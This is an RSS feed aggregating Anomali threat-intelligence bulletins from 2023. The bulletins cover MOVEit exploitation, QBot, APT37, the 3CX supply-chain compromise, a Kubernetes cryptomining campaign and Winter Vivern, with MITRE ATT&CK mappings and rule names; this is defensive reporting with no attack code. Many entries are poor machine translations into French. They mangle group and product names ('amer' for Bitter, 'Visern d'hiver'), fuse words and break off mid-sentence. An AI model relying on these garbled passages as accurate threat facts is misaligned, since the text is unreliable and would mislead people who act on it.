This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2024-06-02T21:08:23+00:00 www.secnews.physaphae.fr Anomali - Firm Blog Figure 1 - Diagrammes de résumé du CIO.Ces graphiques résument les CIO attachés à ce magazine et donnent un aperçu des menaces discutées. Cyber News et Intelligence des menaces événement de sécurité mondiale anomali Intel - Progress Software Vulnerabilities & ndash;Moveit & amp;DataDirect Connect (Publié: 16 juin 2023) Après la découverte de CVE-2023-34362 et son exploitation antérieure par un affilié des ransomwares CLOP, plusieurs vulnérabilités supplémentaires ont été découvertes dans Moveit Transfer (CVE-2023-35036 et CVE-2023-35708) et d'autres produits de logiciels de progrès (CVE et CVE-2023-34363 et CVE-2023-34364).Alors que le site de fuite de Darkweb du groupe (> _clop ^ _- les fuites) a commencé à s'adresser aux entités compromises, l'événement d'exploitation original a été évalué comme un événement de sécurité mondial.Ceci est basé sur la liste croissante des organisations violées connues et l'utilisation de Moveit parmi des milliers d'organisations à travers le monde, y compris les secteurs public, privé et gouvernemental. Commentaire des analystes: Les défenseurs du réseau doivent suivre les étapes d'assainissement des logiciels de progrès qui incluent le durcissement, la détection, le nettoyage et l'installation des récentes correctifs de sécurité de transfert Moveit.Les règles YARA et les indicateurs basés sur l'hôte associés à l'exploitation de déplacement observé sont disponibles dans la plate-forme Anomali pour la détection et la référence historique. mitre att & amp; ck: [mitre att & amp; ck] t1190 - exploiter le publicApplication | [mitre att & amp; ck] t1036 - masquée | [mitre att & amp; ck] t1560.001 - Données collectées par les archives: archive via l'utilité Signatures (Sigma Rules): Exploitation potentielle de transfert de déplacement | exploitation movet . (Règles Yara) lemurloot webshell dll charges utiles - yara by mandiant | scénarisation de la webshell lemurloot ASP.net - yara par mandiant | exploitation movet - yara par Florian Roth | moveit_transfer_exploit_webshell_aspx | moveit_transfer_exploit_webshell_dll Tags: Target-Software: Moveit Transfer, Vulnérabilité: CVE-2023-34362, Vulnérabilité: CVE-2023-35036, Vulnérabilité: CVE-2023-35708, Vulnérabilité: CVE-2023-34363, Vulnérabilité:CVE-2023-34364, Target-Country: ÉtatsType: ransomware, malware: Lemurloot, Type de logiciels malveillants: webs]]> 2023-06-21T20:11:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-cadet-blizzard-new-gru-apt-chameldoh-hard-to-detect-linux-rat-stealthy-doublefinger-targets-cryptocurrency www.secnews.physaphae.fr/article.php?IdArticle=8347828 False Ransomware,Tool,Threat,Cloud APT 28 2.0000000000000000 Anomali - Firm Blog Anomali MOVEit Vulnerability Dashboard The Anomali Threat Research team has additionally researched and documented additional details on this vulnerability via Threat Bulletin. The team has also identified over 430 relevant  indicators and signatures and several sector specific articles to provide more industry-specific details. The dashboard below highlights some of the insights available to Anomali customers via ThreatStream. What can you do about it? There are several steps important to reduce the impact of this vulnerability, some of which are also documented in Progress’ knowledge base article [6] 1. Discover your attack surface. there are several tools that offer this capability, including Anomali Attack Surface Management [7] 2. Patch the vulnerable systems at the earliest. The Progress knowledge base [6] article captures this in the following steps           a.Disable HTTP/S traffic to your MOVEit Transfer environment           b.Patch the vulnerable systems           c.Enable HTTP/S access to the MOVEit Transfer environment 3. Monitor your environment for any known indicators to identify malicious activities. The Anomali Threat Bulletin captures over 2200 observables that can be used to monitor for malicious activities via a SIEM, firewall, or other technologies. Proactively distribute these indicators to your security controls (firewalls, proxies, etc.) to monitor for any malicious activity. Anomali MOVEit Vulnerability Threat Bulletin 4. Hunt for any attacker footprints. While monitoring looks forward, hunting a]]> 2023-06-17T01:48:00+00:00 https://www.anomali.com/blog/are-you-ready-for-moveit www.secnews.physaphae.fr/article.php?IdArticle=8346382 False Ransomware,Tool,Vulnerability,Threat None 2.0000000000000000 Anomali - Firm Blog Figure 1 - Diagrammes de résumé du CIO.Ces graphiques résument les CIO attachés à ce magazine et donnent un aperçu des menaces discutées. Cyber News et Intelligence des menaces vulnérabilité de la journée zéro dansTransfert Moveit exploité pour le vol de données (Publié: 2 juin 2023) Une vulnérabilité du zéro-day dans le logiciel de transfert de fichiers géré de transfert Moveit (CVE-2023-34362) a été annoncée par Progress Software Corporation le 31 mai 2023. Les chercheurs mandiants ont observé une large exploitation qui avait déjà commencé le 27 mai le 27 mai, 2023. Cette campagne opportuniste a affecté le Canada, l'Allemagne, l'Inde, l'Italie, le Pakistan, les États-Unis et d'autres pays.Les attaquants ont utilisé le shell Web LemurLoot personnalisé se faisant passer pour un composant légitime du transfert Moveit.Il est utilisé pour exfiltrater les données précédemment téléchargées par les utilisateurs de systèmes de transfert Moveit individuels.Cette activité d'acteur est surnommée UNC4857 et elle a une faible similitude de confiance avec l'extorsion de vol de données attribuée à FIN11 via le site de fuite de données de ransomware CL0P. Commentaire des analystes: L'agence américaine de sécurité de cybersécurité et d'infrastructure a ajouté le CVE-2023-34362 du CVE-2023-34362 à sa liste de vulnérabilités exploitées connues, ordonnant aux agences fédérales américaines de corriger leurs systèmes d'ici le 23 juin 2023.Progress Software Corporation STAPES RESTATIONS, notamment le durcissement, la détection, le nettoyage et l'installation des récentes correctifs de sécurité de transfert Moveit.Les règles YARA et les indicateurs basés sur l'hôte associés à la coque en ligne Lemurloot sont disponibles dans la plate-forme Anomali pour la détection et la référence historique. mitre att & amp; ck: [mitre att & amp; ck] t1587.003 - développer des capacités:Certificats numériques | [mitre att & amp; ck] t1190 - exploiter la demande publique | [mitre att & amp; ck] t1036 - masquée | [mitre att & amp; ck] t1136 - créer un compte | [mitre att & amp; ck] t1083 - Discovery de dossier et d'annuaire | [mitre att & amp; ck] t1560.001 -Données collectées des archives: Archive via l'utilitaire Signatures: LEMURLOOT WEBSHELL DLL TARDS - YARA BY BYMandiant | scénarisation de la webshell lemurloot ASP.net - yara par mandiant | Moveit Exploitation - Yara par Florian Roth . Tags: Malware: LemurLoot,]]> 2023-06-06T19:11:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-lemurloot-on-exploited-moveit-transfers-zero-click-ios-exploit-targeted-kaspersky-qakbot-turns-bots-into-proxies www.secnews.physaphae.fr/article.php?IdArticle=8342695 False Ransomware,Malware,Tool,Vulnerability,Threat None 2.0000000000000000 Anomali - Firm Blog Figure 1 - Diagrammes de résumé du CIO.Ces graphiques résument les CIO attachés à ce magazine et donnent un aperçu des menaces discutées. Cyber News et Intelligence des menaces shadowVictiticoor et Coinmin de Force Group \\ (Publié: 27 mai 2023) Force Shadow est une menace qui cible les organisations sud-coréennes depuis 2013. Il cible principalement les serveurs Windows.Les chercheurs d'AHNLAB ont analysé l'activité du groupe en 2020-2022.Les activités de force fantôme sont relativement faciles à détecter car les acteurs ont tendance à réutiliser les mêmes noms de fichiers pour leurs logiciels malveillants.Dans le même temps, le groupe a évolué: après mars, ses fichiers dépassent souvent 10 Mo en raison de l'emballage binaire.Les acteurs ont également commencé à introduire divers mineurs de crypto-monnaie et une nouvelle porte dérobée surnommée Viticdoor. Commentaire de l'analyste: Les organisations doivent garder leurs serveurs à jour et correctement configurés avec la sécurité à l'esprit.Une utilisation et une surchauffe du processeur inhabituellement élevées peuvent être un signe du détournement de ressources malveillantes pour l'exploitation de la crypto-monnaie.Les indicateurs basés sur le réseau et l'hôte associés à la force fantôme sont disponibles dans la plate-forme Anomali et il est conseillé aux clients de les bloquer sur leur infrastructure. mitre att & amp; ck: [mitre att & amp; ck] t1588.003 - obtenir des capacités:Certificats de signature de code | [mitre att & amp; ck] t1105 - transfert d'outils d'entrée | [mitre att & amp; ck] t1027.002 - fichiers ou informations obscurcies: emballage logiciel | [mitre att & amp; ck] t1569.002: exécution du service | [mitre att & amp; ck] T1059.003 - Commande et script Interpréteur: Windows Command Shell | [mitre att & amp; ck] T1547.001 - Exécution de botter ou de connexion automatique: Registre Run Keys / Startup Folder | [mitre att & amp; ck] t1546.008 - Événement Exécution déclenchée: caractéristiques de l'accessibilité | [mitre att & amp; ck] t1543.003 - créer ou modifier le processus système: service Windows | [mitre att & amp; ck] t1554 - compromis le logiciel client binaire | [mitreAtt & amp; ck] t1078.001 - Comptes valides: comptes par défaut | [mitre att & amp; ck] t1140 - désobfuscate / décode ou infor]]> 2023-05-31T17:19:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-shadow-force-targets-korean-servers-volt-typhoon-abuses-built-in-tools-cosmicenergy-tests-electric-distribution-disruption www.secnews.physaphae.fr/article.php?IdArticle=8340962 False Ransomware,Malware,Tool,Vulnerability,Threat APT 38,CosmicEnergy ,Guam 2.0000000000000000 Anomali - Firm Blog Figure 1 - Diagrammes de résumé du CIO.Ces graphiques résument les CIO attachés à ce magazine et donnent un aperçu des menaces discutées. Cyber News et Intelligence des menaces lancefly: Le groupe utilise la porte dérobée personnalisée pour cibler les orgs au gouvernement, l'aviation, d'autres secteurs (Publié: 15 mai 2023) Les chercheurs de Symantec ont détecté une nouvelle campagne de cyberespionnage par le groupe parrainé par Lancefly Chine ciblant les organisations en Asie du Sud et du Sud-Est.De la mi-2022 à 2023, le groupe a ciblé les secteurs de l'aviation, du gouvernement, de l'éducation et des télécommunications.Les indications des vecteurs d'intrusion montrent que Lancefly est peut-être passé des attaques de phishing à la force brute SSH et en exploitant des dispositifs accessibles au public tels que les équilibreurs de charge.Un petit nombre de machines ont été infectées de manière très ciblée pour déployer la porte dérobée Merdoor personnalisée et une modification de la ZXShell Rootkit open source.Lancefly abuse d'un certain nombre de binaires légitimes pour le chargement latéral DLL, le vol d'identification et d'autres activités de vie (lolbin). Commentaire des analystes: Les organisations sont conseillées de surveiller l'activité suspecte des PME et les activités LOLBIN indiquant une éventuelle injection de processus ou un dumping de la mémoire LSASS.Les hachages de fichiers associés à la dernière campagne Lancefly sont disponibles dans la plate-forme Anomali et il est conseillé aux clients de les bloquer sur leur infrastructure. mitre att & amp; ck: [mitre att & amp; ck] t1190 - exploiter l'application de formation publique | [mitreAtt & amp; ck] t1078 - comptes valides | [mitre att & amp; ck] t1056.001 - Capture d'entrée: keylogging | [mitre att & amp; ck] t1569 - services système | [mitre att & amp; ck] t1071.001 - couche d'applicationProtocole: protocoles Web | [mitre att & amp; ck] t1071.004 - protocole de couche d'application: DNS | [mitre att & amp; ck] t1095 - couche non applicationProtocole | [mitre att & amp; ck] t1574.002 - flux d'exécution de hijack: chargement secondaire dll | [mitre att & amp; ck] T1003.001 - Dumping des informations d'identification du système d'exploitation: mémoire lsass | [mitre att & amp; ck] T1003.002 - Dumping des informations d'identification du système d'exploitation: gestionnaire de compte de s]]> 2023-05-16T18:03:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-lancefly-apt-adopts-alternatives-to-phishing-bpfdoor-removed-hardcoded-indicators-fbi-ordered-russian-malware-to-self-destruct www.secnews.physaphae.fr/article.php?IdArticle=8337033 False Ransomware,Malware,Tool,Vulnerability,Threat,Cloud None 2.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Deconstructing Amadey’s Latest Multi-Stage Attack and Malware Distribution (published: May 5, 2023) McAfee researchers have detected a multi-stage attack that starts with a trojanized wextract.exe, Windows executable used to extract files from a cabinet (CAB) file. It was used to deliver the AgentTesla, Amadey botnet, LockBit ransomware, Redline Stealer, and other malicious binaries. To avoid detection, the attackers use obfuscation and disable Windows Defender through the registry thus stopping users from turning it back on through the Defender settings. Analyst Comment: Threat actors are always adapting to the security environment to remain effective. New techniques can still be spotted with behavioral analysis defenses and social engineering training. Users should report suspicious files with double extensions such as .EXE.MUI. Indicators associated with this campaign are available in the Anomali platform and users are advised to block these on their infrastructure. MITRE ATT&CK: [MITRE ATT&CK] T1562.001: Disable or Modify Tools | [MITRE ATT&CK] T1555 - Credentials From Password Stores | [MITRE ATT&CK] T1486: Data Encrypted for Impact | [MITRE ATT&CK] T1027 - Obfuscated Files Or Information Tags: malware:Amadey, malware-type:Botnet, malware:RedLine, malware:AgentTesla, malware-type:Infostealer, malware:LockBit, malware-type:Ransomware, abused:Wextract.exe, file-type:CAB, file-type:EXE, file-type:MUI, target-program:Windows Defender, target-system:Windows Eastern Asian Android Assault – FluHorse (published: May 4, 2023) Active since May 2022, a newly-detected Android stealer dubbed FluHorse spreads mimicking popular apps or as a fake dating application. According to Check Point researchers, FluHorse was targeting East Asia (Taiwan and Vietnam) while remaining undetected for months. This stealthiness is achieved by sticking to minimal functions while also relying on a custom virtual machine that comes with the Flutter user interface software development kit. FluHorse is being distributed via emails that prompt the recipient to install the app and once installed, it asks for the user’s credit card or banking data. If a second factor authentication is needed to commit banking fraud, FluHorse tells the user to wait for 10-15 minutes while intercepting codes by installing a listener for all incoming SMS messages. Analyst Comment: FluHorse\'s ability to remain undetected for months makes it a dangerous threat. Users should avoid installing applications following download links received via email or other messaging. Verify the app authenticity on the official com]]> 2023-05-09T20:02:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-custom-virtual-environment-hides-fluhorse-babyshark-evolved-into-reconshark-fleckpe-infected-apps-add-expensive-subscriptions www.secnews.physaphae.fr/article.php?IdArticle=8334939 False Malware,Tool,Threat APT 43,APT 37 3.0000000000000000 Anomali - Firm Blog Figure 1 - Diagrammes de résumé du CIO.Ces graphiques résument les CIO attachés à ce magazine et donnent un aperçu des menaces discutées. Cyber News et Intelligence des menaces Réaction en chaîne: Rokrat & rsquo; s.Lien manquant (Publié: 1er mai 2023) Depuis 2022, le groupe parrainé par le Nord-Korea APT37 (Group123, Ricochet Chollima) a principalement changé ses méthodes de livraison de Maldocs pour cacher des charges utiles à l'intérieur des fichiers LNK surdimensionnés.Vérifier les chercheurs a identifié plusieurs chaînes d'infection utilisées par le groupe de juillet 2022 à avril 2023. Celles-ci ont été utilisées pour livrer l'un des outils personnalisés de l'APT37 (Goldbackdoor et Rokrat), ou le malware de marchandises Amadey.Tous les leurres étudiés semblent cibler des personnes coréennes avec des sujets liés à la Corée du Sud. Commentaire de l'analyste: Le passage aux chaînes d'infection basées sur LNK permet à APT37 de l'interaction utilisateur moins requise car la chaîne peut être déclenchée par un simple double clic.Le groupe continue l'utilisation de Rokrat bien triés qui reste un outil furtif avec ses couches supplémentaires de cryptage, le cloud C2 et l'exécution en mémoire.Les indicateurs associés à cette campagne sont disponibles dans la plate-forme Anomali et il est conseillé aux clients de les bloquerleur infrastructure. mitre att & amp; ck: [mitre att & amp; ck] t1059.001: Powershell | [mitre att & amp; ck] t1055 - injection de processus | [mitre att & amp; ck] t1027 - fichiers ou informations obscurcis | [mitre att & amp; ck] t1105 - transfert d'outils d'entrée | [mitre att & amp; ck] t1204.002 - Exécution des utilisateurs: fichier malveillant | [mitre att & amp; ck] t1059.005 - commande et script interprète: visuel basique | [mitre att & amp; ck] t1140 - désobfuscate / décode ou informations | [mitre att & amp; ck] T1218.011 - Exécution par proxy binaire signée: Rundll32 Tags: malware: Rokrat, mitre-software-id: s0240, malware-Type: Rat, acteur: Groupe123, mitre-groupe: APT37, acteur: Ricochet Chollima, Country source: Corée du Nord, Country source: KP, Cible-Country: Corée du Sud, Cible-Country: KR, Type de fichier: Zip, déposer-Type: Doc, Fichier-Type: ISO, Fichier-Type: LNK, File-Type: Bat, File-Type: EXE, Fichier-Type: VBS, malware: Amadey,MALWARE: Goldbackdoor, Type de logiciels malveillants: porte dérobée, abusée: Pcloud, abusé: Cloud Yandex, abusé: OneDrive, abusé: & # 8203; & # 8203; Processeur de mots Hangul, abusé: themida, système cible: Windows ]]> 2023-05-01T23:16:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-apt37-adopts-lnk-files-charming-kitten-uses-bellaciao-implant-dropper-vipersoftx-infostealer-unique-byte-remapping-encryption www.secnews.physaphae.fr/article.php?IdArticle=8332656 False Ransomware,Malware,Tool,Vulnerability,Threat,Prediction,Cloud APT 35,APT 37,APT 37 2.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence First-Ever Attack Leveraging Kubernetes RBAC to Backdoor Clusters (published: April 21, 2023) A new Monero cryptocurrency-mining campaign is the first recorded case of gaining persistence via Kubernetes (K8s) Role-Based Access Control (RBAC), according to Aquasec researchers. The recorded honeypot attack started with exploiting a misconfigured API server. The attackers preceded by gathering information about the cluster, checking if their cluster was already deployed, and deleting some existing deployments. They used RBAC to gain persistence by creating a new ClusterRole and a new ClusterRole binding. The attackers then created a DaemonSet to use a single API request to target all nodes for deployment. The deployed malicious image from the public registry Docker Hub was named to impersonate a legitimate account and a popular legitimate image. It has been pulled 14,399 times and 60 exposed K8s clusters have been found with signs of exploitation by this campaign. Analyst Comment: Your company should have protocols in place to ensure that all cluster management and cloud storage systems are properly configured and patched. K8s buckets are too often misconfigured and threat actors realize there is potential for malicious activity. A defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) approach is a good mitigation step to help prevent actors from highly-active threat groups. MITRE ATT&CK: [MITRE ATT&CK] T1190 - Exploit Public-Facing Application | [MITRE ATT&CK] T1496 - Resource Hijacking | [MITRE ATT&CK] T1036 - Masquerading | [MITRE ATT&CK] T1489 - Service Stop Tags: Monero, malware-type:Cryptominer, detection:PUA.Linux.XMRMiner, file-type:ELF, abused:Docker Hub, technique:RBAC Buster, technique:Create ClusterRoleBinding, technique:Deploy DaemonSet, target-system:Linux, target:K8s, target:​​Kubernetes RBAC 3CX Software Supply Chain Compromise Initiated by a Prior Software Supply Chain Compromise; Suspected North Korean Actor Responsible (published: April 20, 2023) Investigation of the previously-reported 3CX supply chain compromise (March 2023) allowed Mandiant researchers to detect it was a result of prior software supply chain attack using a trojanized installer for X_TRADER, a software package provided by Trading Technologies. The attack involved the publicly-available tool SigFlip decrypting RC4 stream-cipher and starting publicly-available DaveShell shellcode for reflective loading. It led to installation of the custom, modular VeiledSignal backdoor. VeiledSignal additional modules inject the C2 module in a browser process instance, create a Windows named pipe and]]> 2023-04-25T18:22:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-two-supply-chain-attacks-chained-together-decoy-dog-stealthy-dns-communication-evilextractor-exfiltrates-to-ftp-server www.secnews.physaphae.fr/article.php?IdArticle=8331005 False Ransomware,Spam,Malware,Tool,Threat,Cloud APT 38,ChatGPT,APT 43,Uber 2.0000000000000000 Anomali - Firm Blog Figure 1 - Diagrammes de résumé du CIO.Ces graphiques résument les CIO attachés à ce magazine et donnent un aperçu des menaces discutées. Cyber News et Intelligence des menaces banquier QBOT livré par correspondance commerciale (Publié: 17 avril 2023) Début avril 2023, un volume accru de Malspam en utilisant le détournement de fil commercial-imail a été détecté pour fournir le troin bancaire QBOT (QAKBOT, Quackbot, Pinkslipbot).Les leurres observés en anglais, en allemand, en italien et en français visaient divers pays, les trois premiers étant l'Allemagne, l'Argentine et l'Italie, dans cet ordre.Les attaquants usurpaient un nom dans la conversation détournée pour inciter la cible à ouvrir un fichier PDF ci-joint.La cible est ensuite confrontée à un bouton, à un mot de passe et à une instruction pour télécharger, déballer et exécuter un fichier de script Windows malveillant (WSF) dans une archive protégée par mot de passe.L'exécution des utilisateurs est suivie d'une désobfuscation automatisée d'un JScript contenu produisant un script PowerShell codé visant à télécharger une DLL QBOT à partir d'un site Web compromis et à l'exécuter à l'aide de RunDLL32.QBOT vole les informations d'identification, profil les systèmes pour identifier les perspectives de ciblage supplémentaire de grande valeur et vole des e-mails stockés localement pour une prolifération supplémentaire via le détournement de fil calspam. Commentaire de l'analyste: L'usurpation du nom de l'expéditeur des lettres précédentes du & lsquo; from & rsquo;Le champ peut être identifié dans cette campagne car il utilise une adresse e-mail frauduleuse de l'expéditeur différent de celle du véritable correspondant.Les utilisateurs doivent être prudents avec des archives protégées par mot de passe et des types de fichiers suspects tels que WSF.Les indicateurs de réseau et d'hôtes associés à cette campagne QBOT sont disponibles dans la plate-forme Anomali et il est conseillé aux clients de les bloquer sur leur infrastructure. mitreAtt & amp; ck: [mitre att & amp; ck] t1566 - phishing | [mitre att & amp; ck] t1204 - exécution des utilisateurs | [mitre att & amp; ck] t1207 - contrôleur de domaine voyou | [mitre att & amp; ck] t1140 - déobfuscate /Décoder des fichiers ou des informations | [mitre att & amp; ck] t1059.001: powershell | [mitre att & amp; ck] t1218.011 - Exécution par proxy binaire signée: rundll32 | [mitre att & amp; ck] t1090 - proxy | [mitre att & amp; ck] t1114.001 - collection de courriels: collection de message]]> 2023-04-18T17:14:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-cozy-bear-employs-new-downloaders-rtm-locker-ransomware-seeks-privacy-vice-society-automated-selective-exfiltration www.secnews.physaphae.fr/article.php?IdArticle=8328981 False Ransomware,Malware,Tool,Threat APT 29,APT 29 2.0000000000000000 Anomali - Firm Blog Figure 1 - Diagrammes de résumé du CIO.Ces graphiques résument les CIO attachés à ce magazine et donnent un aperçu des menaces discutées. Cyber News et Intelligence des menaces cryptoclippie parle portugais (Publié: 5 avril 2023) Depuis au moins au début de 2022, une campagne de clipper de crypto-monnaie opportuniste cible des conférenciers portugais en invitant un téléchargement à partir d'un site Web contrôlé par l'acteur promu via un empoisonnement SEO et malvertiser abusant Google Ads.Le fichier imite WhatsApp Web et fournit des cryptoclippages doublés de logiciels malveillants dans le but de remplacer les adresses de crypto-monnaie dans le presse-papiers Target & Acirc; & euro; & Trade.Les deux premiers fichiers de la chaîne d'infection sont EXE et BAT ou ZIP et LNK.Les acteurs utilisent des techniques d'obscurcissement et de cryptage étendues (RC4 et XOR), la compensation des journaux et des fichiers, et un profilage approfondi des utilisateurs pour un ciblage étroit et une évasion de défense.L'utilisation du type d'obscuscation invoqué-obfuscation peut indiquer un attaquant brésilien. Commentaire de l'analyste: Les portefeuilles contrôlés par l'acteur observés ont gagné un peu plus de 1 000 dollars américains, mais leurs logiciels malveillants complexes à plusieurs étages peuvent les aider à étendre ces dégâts.Il est conseillé aux utilisateurs de vérifier les informations du destinataire avant d'envoyer une transaction financière.Des indicateurs liés à la cryptoclippie sont disponibles dans la plate-forme Anomali.Les organisations qui publient des applications pour leurs clients sont invitées à utiliser une protection contre les risques numériques anomalie premium pour découvrir des applications malveillantes et malveillantes imitant votre marque que les équipes de sécurité ne recherchent généralement ni ne surveillent. mitre att & amp; ck: [mitre att & amp; ck] t1204 - exécution de l'utilisateur | [mitre att & amp; ck] t1027 - fichiers obscurcissantsOu des informations | [mitre att & amp; ck] t1059.001: powershell | [mitre att & amp; ck] t1105 - transfert d'outils d'entrée | [mitre att & amp; ck] t1140 - déobfuscate / décode les fichiers ou informations | [mitre att & amp; ck] t1620 - chargement de code réfléchissant | [mitreAtt & amp; ck] T1547.001 - Exécution de démarrage ou de connexion Autostart: Registry Run Keys / Startup Folder | [mitre att & amp; ck] t1112: modifier le registre | [mitre att & amp; ck] t1136.001 - Crée]]> 2023-04-11T19:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-aggressively-mutating-mantis-backdoors-target-palestine-fake-cracked-packages-flood-npm-rorschach-ransomware-is-significantly-faster-than-lockbit-v3 www.secnews.physaphae.fr/article.php?IdArticle=8326770 False Ransomware,Malware,Tool,Threat APT-C-23 2.0000000000000000 Anomali - Firm Blog Figure 1 - Diagrammes de résumé du CIO.Ces graphiques résument les CIO attachés à ce magazine et donnent un aperçu des menaces discutées. Cyber News et Intelligence des menaces Vulnérabilité à haute gravité dans WordPress Elementor Pro patchée (Publié: 31 mars 2023) La campagne Balada Injecteur cible les plugins et les thèmes de site Web vulnérables depuis au moins 2017. Sa nouvelle cible sont les sites Web WordPress WooCommerce avec une vulnérabilité de contrôle d'accès brisé dans le populaire site Web Plugin Elementor Pro.Cette vulnérabilité à haute gravité (CVSS V3.1: 8.8, élevée) a reçu un patch de sécurité le 22 mars 2023, par conséquent, l'injecteur de Balada cible des sites Web qui n'ont pas encore été corrigés.Les attaquants créent un nouvel utilisateur administrateur et insérent un script envoyant des visiteurs à une redirection multi-HOP aux fins de spam, d'escroquerie ou d'installation de logiciels publicitaires. Commentaire de l'analyste: Les administrateurs de sites Web doivent mettre à jour immédiatement s'ils ont Elementor Pro version 3.11.6 ou moins installé.Utilisez la numérisation côté serveur pour détecter le contenu malveillant non autorisé.Tous les indicateurs connus associés à la campagne Balada Injector sont disponibles dans la plate-forme Anomali et il est conseillé aux clients de les bloquer sur leur infrastructure. mitre att & amp; ck: [mitre att & amp; ck] t1587.004 - développer des capacités:Exploits | [mitre att & amp; ck] t1190 - exploiter l'application de formation publique Tags: Campagne: Balada Injecteur, site Web compromis, redirection, spam, arnaque, type malware: Adware, Contrôle d'accès cassé, vulnérabilité, élémentor Pro, WordPress 3cx: SupplyL'attaque en chaîne affecte des milliers d'utilisateurs dans le monde (Publié: 30 mars 2023) Un groupe de menaces non identifié lié à la Corée du Nord a trojanisé le bureau de 3cx \\, un client de bureau vocal et vidéo utilisé par 12 millions d'utilisateurs dans 190 pays.Les installateurs de Windows récents (18.12.407 et 18.12.416) et Mac (18.11.1213, 18.12.402, 18.12.407 et 18.12.416) ont été compromis.Les installateurs de Windows contenaient des versions propres de l'application ainsi que des DLL malveillantes prêtes pour l'attaque de chargement latéral DLL.Les versions MacOS affectées ont été compromises de la même manière et contenaient une version trojanisée de la bibliothèque dynamique nommée libffmpeg.dylib.La charge utile finale observée était un logiciel malveillant de volée d'informations téléchargé comme un fichier ICO à partir d'un référentiel GitHub spécifique. Commentaire de l'analyste: Les attaques de la chaîne d]]> 2023-04-03T22:13:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-clipboard-injectors-infostealers-malvertising-pay-per-install-supply-chain-and-vulnerabilities www.secnews.physaphae.fr/article.php?IdArticle=8324500 False Malware,Tool,Vulnerability,Threat None 2.0000000000000000 Anomali - Firm Blog Figure 1 - Diagrammes de résumé du CIO.Ces graphiques résument les CIO attachés à ce magazine et donnent un aperçu des menaces discutées. Cyber News et Intelligence des menaces campagne de phishingCible l'industrie chinoise de l'énergie nucléaire (Publié: 24 mars 2023) Actif Depuis 2013, le groupe amer (T-APT-17) est soupçonné d'être parrainé par le gouvernement indien.Des chercheurs Intezer ont découvert une nouvelle campagne amère ciblant les universitaires, le gouvernement et d'autres organisations de l'industrie de l'énergie nucléaire en Chine.Les techniques sont cohérentes avec les campagnes amères observées précédemment.L'intrusion commence par un e-mail de phishing censé provenir d'un véritable employé de l'ambassade du Kirghizistan.Les pièces jointes malveillantes observées étaient soit des fichiers HTML (CHM) compilés à Microsoft, soit des fichiers Microsoft Excel avec des exploits d'éditeur d'équation.L'objectif des charges utiles est de créer de la persistance via des tâches planifiées et de télécharger d'autres charges utiles de logiciels malveillants (les campagnes amères précédentes ont utilisé le voleur d'identification du navigateur, le voleur de fichiers, le keylogger et les plugins d'outils d'accès à distance).Les attaquants se sont appuyés sur la compression LZX et la concaténation des cordes pour l'évasion de détection. Commentaire de l'analyste: De nombreuses attaques avancées commencent par des techniques de base telles que des e-mails injustifiés avec une pièce jointe qui oblige l'utilisateur à l'ouvrir.Il est important d'enseigner l'hygiène de base en ligne à vos utilisateurs et la sensibilisation au phishing.Il est sûr de recommander de ne jamais ouvrir de fichiers CHM joints et de garder votre bureau MS Office entièrement mis à jour.Tous les indicateurs connus associés à cette campagne amère sont disponibles dans la plate-forme Anomali et il est conseillé aux clients de les bloquer sur leur infrastructure. mitre att & amp; ck: [mitre att & amp; ck] t1589.002 - rassembler l'identité des victimesInformations: Adresses e-mail | [mitre att & amp; ck] t1566.001 -Phishing: attachement de espionnage | [mitre at]]> 2023-03-28T21:28:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-account-takeover-apt-banking-trojans-china-cyberespionage-india-malspam-north-korea-phishing-skimmers-ukraine-and-vulnerabilities www.secnews.physaphae.fr/article.php?IdArticle=8322667 False Malware,Tool,Threat,Cloud APT 43,APT 37 2.0000000000000000 Anomali - Firm Blog Figure 1 - Diagrammes de résumé du CIO.Ces graphiques résument les CIO attachés à ce magazine et donnent un aperçu des menaces discutées. Cyber News et Intelligence des menaces Visern d'hiver |Découvrir une vague d'espionnage mondial (Publié: 16 mars 2023) Depuis décembre 2020, Winter Vivern se livrait à des campagnes de cyberespionnage alignées sur les objectifs du Bélarus et du gouvernement russe.Depuis janvier 2021, il a ciblé les organisations gouvernementales en Lituanie, en Inde, au Vatican et en Slovaquie.De la mi-2022 à décembre 2022, il a ciblé l'Inde et l'Ukraine: a usurpé l'identité du site Web du service de courrier électronique du gouvernement indien et a envoyé un excel macro-compétitif pour cibler un projet facilitant la reddition du personnel militaire russe.Au début de 2023, Winter Vivern a créé de fausses pages pour le bureau central de la Pologne pour la lutte contre la cybercriminalité, le ministère ukrainien des Affaires étrangères et le service de sécurité de l'Ukraine.Le groupe s'appuie souvent sur le simple phishing pour les références.Un autre type d'activité d'hiver VIVERN comprend des documents de bureau malveillants avec des macros, un script de chargeur imitant un scanner de virus et l'installation de la porte dérobée de l'ouverture.L'infrastructure malveillante du groupe comprend des domaines typosquattés et des sites Web WordPress compromis. Commentaire de l'analyste: Faites attention si un domaine demande vos mots de passe, essayez d'établir son authenticité et sa propriété.Les clients anomalis préoccupés par les risques pour leurs actifs numériques (y compris les domaines similaires / typosquattés) peuvent essayer Service de protection numérique premium d'Anomali \\ 's .De nombreuses attaques avancées commencent par des techniques de base telles que des e-mails injustifiés avec des pièces jointes malveillantes qui obligent l'utilisateur à l'ouvrir et à activer les macroses.Il est important d'enseigner à vos utilisateurs une hygiène de base en ligne et une conscience de phishing. mitre att & amp; ck: [mitre att & amp; ck] t1583.001 -Acquérir des infrastructures: domaines | [mitre att & amp; ck] t1566.001 - phishing: spearphishing attachement | [mitre att & amp; ck] t1059.001: powershell | [mitre att & amp; ck] t1059.003 - commande et scriptInterprète: Shell de commande Windows | 